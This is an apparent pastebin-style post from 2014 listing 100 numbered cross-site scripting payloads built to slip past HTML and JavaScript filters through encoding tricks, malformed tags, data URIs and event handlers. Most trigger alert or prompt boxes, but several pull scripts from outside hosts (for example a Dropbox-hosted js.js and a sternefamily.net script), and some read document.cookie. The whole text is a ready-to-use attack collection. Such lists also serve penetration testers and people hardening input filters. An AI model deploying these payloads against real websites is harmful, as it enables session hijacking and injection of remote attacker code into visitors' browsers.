Oh hi
27-03-2014 4:28pm
1) <iframe %00 src="	javascript:prompt(1)	"%00>
2) <svg><style>{font-family:'<iframe/onload=confirm(1)>'
3) <input/onmouseover="javaSCRIPT:confirm(1)"
4) <sVg><scRipt %00>alert(1) {Opera}
5) <img/src=`%00` onerror=this.onerror=confirm(1)
6) <form><isindex formaction="javascript:confirm(1)"
7) <img src=`%00`
 onerror=alert(1)

8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
12) "><h1/onmouseover='\u0061lert(1)'>%00
13) <iframe/src="data:text/html,<svg onload=alert(1)>">
14) <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
18) <iframe src=javascript:alert(document.location)>
19) <form><a href="javascript:\u0061lert(1)">X
20) </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
21) <img/
src=`~` onerror=prompt(1)>
22) <form><iframe
src="javascript:alert(1)"
;>
23) <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
>X</a
24) http://www.google<script .com>alert(document.location)</script
25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
onerror = prompt('1')
27) <style/onload=prompt('XSS')
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
29) </style ><script>/**/alert(document.location)/**/</script
30) �</form><input type="date" onfocus="alert(1)">
31) <form><textarea
onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
33) <iframe srcdoc='<body onload=prompt(1)>'>
34) <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
35) <script ~~~>alert(0%0)</script ~~~>
36) <style/onload=<!-- >
alert
(1)>
37) <///style///><span %2F onmousemove='alert(1)'>SPAN
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
40)
<blink/
onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
41) <marquee onstart='javascript:alert(1)'>^__^
42) <div/style="width:expression(confirm(1))">X</div> {IE7}
43) <iframe/%00/ src=javaSCRIPT:alert(1)
44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
45) /*iframe/src*/<iframe/src="<iframe/src=@/onload=prompt(1) /*iframe/src*/>
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
48) <a/href="javascript:
javascript:prompt(1)"><input type="X">
49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
I have already tweeted about the following 50 XSS vectors and so far the paste has more than 1600 hits (http://pastebin.com/mQDbu7Sm)
__________________________________________________________________________________________________________________________________________________________________________________________________________________
51) <a href="javascript:\u0061le%72t(1)"><button>
52) <div onmouseover='alert(1)'>DIV</div>
53) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
54) <a href="jAvAsCrIpT:alert(1)">X</a>
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
57) <var onmouseover="prompt(1)">On Mouse Over</var>
58) <a href=javascript:alert(document.cookie)>Click Here</a>
59) <img src="/" =_=" title="onerror='prompt(1)'">
60) <%<!--'%><script>alert(1);</script -->
61) <script src="data:text/javascript,alert(1)"></script>
62) <iframe/src \/\/onload = prompt(1)
63) <iframe/onreadystatechange=alert(1)
64) <svg/onload=alert(1)
65) <input value=<><iframe/src=javascript:confirm(1)
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
67) http://www.<script>alert(1)</script .com
68) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
69) <svg><script ?>alert(1)
70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
71) <img src=`xx:xx`onerror=alert(1)>
72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
74) <math><a xlink:href="//http://jsfiddle.net/t846h/">click
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
76) <svg contentScriptType=text/vbs><script>MsgBox+1
77) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
80) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
81) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
82) <object data=javascript:\u0061le%72t(1)>
83) <script>+-+-1-+-+alert(1)</script>
84) <body/onload=<!-->
alert(1)>
85) <script itworksinallbrowsers>/*<script* */alert(1)</script
86) <img src ?itworksonchrome?\/onerror = alert(1)
87) <svg><script>//
confirm(1);</script </svg>
88) <svg><script onlypossibleinopera:)> alert(1)
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
90) <script x> alert(1) </script 1=2
91) <div/onmouseover='alert(1)'> style="x:">
92) <--`<img/src=` onerror=alert(1)> --!>
93) <script/src=data:text/javascript,alert(1)></script>
94) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
95) "><img src=x onerror=window.open('https://www.google.com/');>
96) <form><button formaction=javascript:alert(1)>CLICKME
97) <math><a xlink:href="//http://jsfiddle.net/t846h/">click
98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
100) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>">Click Me</a>